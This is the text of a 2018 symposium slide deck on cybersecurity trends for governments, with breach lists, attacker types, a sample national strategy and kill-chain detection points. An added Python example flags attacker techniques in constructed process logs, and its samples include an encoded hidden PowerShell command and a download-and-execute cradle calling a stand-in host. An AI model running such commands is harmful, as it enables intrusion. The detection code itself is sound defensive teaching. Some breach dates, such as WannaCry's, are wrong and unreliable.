The better the question. The better the answer. The better the world works.
Cybersecurity: Trends and Challenges
21st Century Government – City Next Antigua 2018 Symposium
Page 2
“I get hired to hack into computers now and sometimes it's actually easier than it was years ago.”
-- Kevin Mitnick
Page 6
Some breaches you may know
• Equifax – 145 million people … July 2017
• NSA spy tools leaked to internet … April 2017
• Yahoo – 1B accounts hacked … 2013/2014/2016/2017
• 50TB of NSA data stolen over 20 years …
• Cryptocurrency miner … compromised (60M) … Dec 2017
• Uber – 57M customer records breached … 2016
• Swift hack – 81M missing (attempted 850M) … 2016
• Thousands of voter roll records were accessed … Sep 2016
• Ransomware/WannaCry – 300,000 computers … May 2016
• Ransomware infects 400,000 computers … 2017
Page 9
Why
► Attackers are increasingly making use of tools already installed on targeted
computers, like PowerShell, PSExec, or WMI
► Minimizes the risk of an attack being blocked
► Less chance of being detected by traditional security tools
► Running simple scripts and shellcode directly in memory.
► Hide in plain sight
► Clickless infections
Page 10
Complexity of threats
• Unsophisticated attackers (script kiddies): you are on the internet and have a vulnerability.
• Sophisticated attackers (hackers): you are on the internet and have information of value.
• Corporate espionage (insider): a current or former employee seeks gain from selling intellectual property (IP).
• State-sponsored attacks / advanced persistent threat (APT): you are targeted because of who you are, what you do, or the value of your IP.
[Chart: Risk versus attacker resource and sophistication, with the motivations Experimentation, Monetization, Corporate espionage and State-sponsored espionage]
APT life cycle (cycle diagram): Initial exploitation, Data exfiltration, Intelligence gathering, Command and control, Privilege escalation
Page 11
Closer to home
• Trinidad news media group website hacked … 2016
• Thousands of credit cards hacked (Bahamas) … 2013
• Government Minister SM account hacked … 2016
• Four state bodies hacked in two weeks (Jamaica) … Feb 2016
• Militant group hacks Gov’t of St. Vincent’s website … 2015
• Bank account thefts over Christmas period … 2015
• Regional telecom. provider hacked … 2013
• Six government websites compromised … 2015
National Cybersecurity Strategy (SAMPLE)
Focus areas:
• PROTECT CRITICAL INFRASTRUCTURE
• DEVELOP HUMAN CAPITAL
• COOPERATE WITH PARTNERS
• DEFEND & RESPOND
• IMPROVE THREAT AWARENESS
• DEVELOP TECHNICAL CAPABILITIES
[Diagram: layers of FOCUS, POLICY, ENTITY / SECTOR, GOVERNANCE, STANDARDS and INFORMATION]
Entities:
• Entity 1
• Entity 2
• Entity
• Etc.
Sectors:
• Health
• Transport
• Oil & Gas
• Financial
• Etc.
Governance bodies:
• Information Assurance Technical Forums
• National Incident Response Working Group
• National Awareness & Capability Building Committee
• National Policy Working Group
Public Sector Cybersecurity Strategy (SAMPLE)
Page 16
Mission: Comprehensive operational anomaly detection throughout the kill chain
Attack (kill) chain progression: Background research → Initial attack → Establish foothold → Enable persistence → Enterprise recon → Move laterally → Escalate privilege → Gather and encrypt data → Steal data
Threat detection points along the chain:
• Detection that email is malicious
• Detection that communication with attacker exists
• Detection that programs or services are malicious
• Detection that reconnaissance behavior exists
• Detection that traversal behavior exists
• Detection that staging behavior exists
• Detection that privilege escalation behavior exists
• Detection that exfiltration behavior exists
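As an added example that is not part of the presentation: a small Python detection pass tying the "Why" slide (attackers living off PowerShell, PSExec and WMI, running scripts in memory) to the kill-chain slide above. It runs a handful of process-creation rules over constructed Event ID 4688-style records and labels each hit with a kill-chain stage. The sample events, rule names and the stage assigned to each rule are assumptions made for this example.

```python
import re
from collections import Counter

# Constructed Event ID 4688-style records: (host, parent image, new image, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", "outlook.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("WS01", "powershell.exe", "powershell.exe",
     "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""),
    ("SRV02", "services.exe", "PSEXESVC.exe", "PSEXESVC.exe"),
    ("SRV02", "WmiPrvSE.exe", "cmd.exe", "cmd.exe /c whoami /groups"),
    ("WS03", "explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]

# (rule name, kill-chain stage, predicate over lower-cased parent, image and raw cmdline); stages are this example's assumption.
RULES = [
    # PowerShell accepts any unambiguous prefix of -EncodedCommand; the base64
    # script never exists on disk as a file, so file-based AV has nothing to scan.
    ("Encoded PowerShell command (in-memory script)", "Establish foothold",
     lambda p, i, c: i == "powershell.exe"
     and re.search(r"\s-(e|ec|enc|encodedcommand)\s", c, re.I)),
    # Download-and-execute cradle: fetched code is run straight from memory.
    ("PowerShell download cradle (IEX + WebClient)", "Establish foothold",
     lambda p, i, c: i == "powershell.exe"
     and re.search(r"\b(IEX|Invoke-Expression)\b", c, re.I)
     and re.search(r"DownloadString|DownloadFile|Invoke-WebRequest", c, re.I)),
    # PsExec installs a temporary service on the target, started by services.exe.
    ("PsExec service binary started by services.exe", "Move laterally",
     lambda p, i, c: p == "services.exe" and i == "psexesvc.exe"),
    # Remote WMI process creation runs as a child of the WMI provider host.
    ("Shell spawned by WMI provider host", "Move laterally",
     lambda p, i, c: p == "wmiprvse.exe" and i in ("cmd.exe", "powershell.exe")),
    # Mail and Office clients have no legitimate reason to launch PowerShell.
    ("Office application spawning PowerShell", "Initial attack",
     lambda p, i, c: p in ("outlook.exe", "winword.exe", "excel.exe")
     and i == "powershell.exe"),
]

def classify(events):
    """Return (host, rule name, stage, command line) for every rule each event matches."""
    hits = []
    for host, parent, image, cmdline in events:
        for name, stage, pred in RULES:
            if pred(parent.lower(), image.lower(), cmdline):
                hits.append((host, name, stage, cmdline))
    return hits

def stage_summary(hits):
    """Count hits per kill-chain stage: a quick view of how far an intrusion has progressed."""
    return dict(Counter(stage for _, _, stage, _ in hits))
```

Running classify(SAMPLE_EVENTS) flags every event except the benign notepad.exe launch on WS03, and stage_summary shows two hosts already past initial access.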
Page 17
What the next generation of tools look like
[Diagram: vendor network, internal reconnaissance and lateral movement across the HVA interconnect to HVA devices]
► Self-learning models on each pair of communicating nodes
► Use cases covered:
  ► Lateral detection
  ► Reconnaissance detection
  ► Data staging detection
► Can be tuned to be sensitive to the most pressing threats, including:
  ► High Value Assets (HVA)
  ► Insider threat
  ► External attackers
  ► Operational Technology
  ► IoT monitoring
  ► 3rd party vectors
  ► POS, etc.
Highlights
‘PathScan’ detects attacks across interconnected networks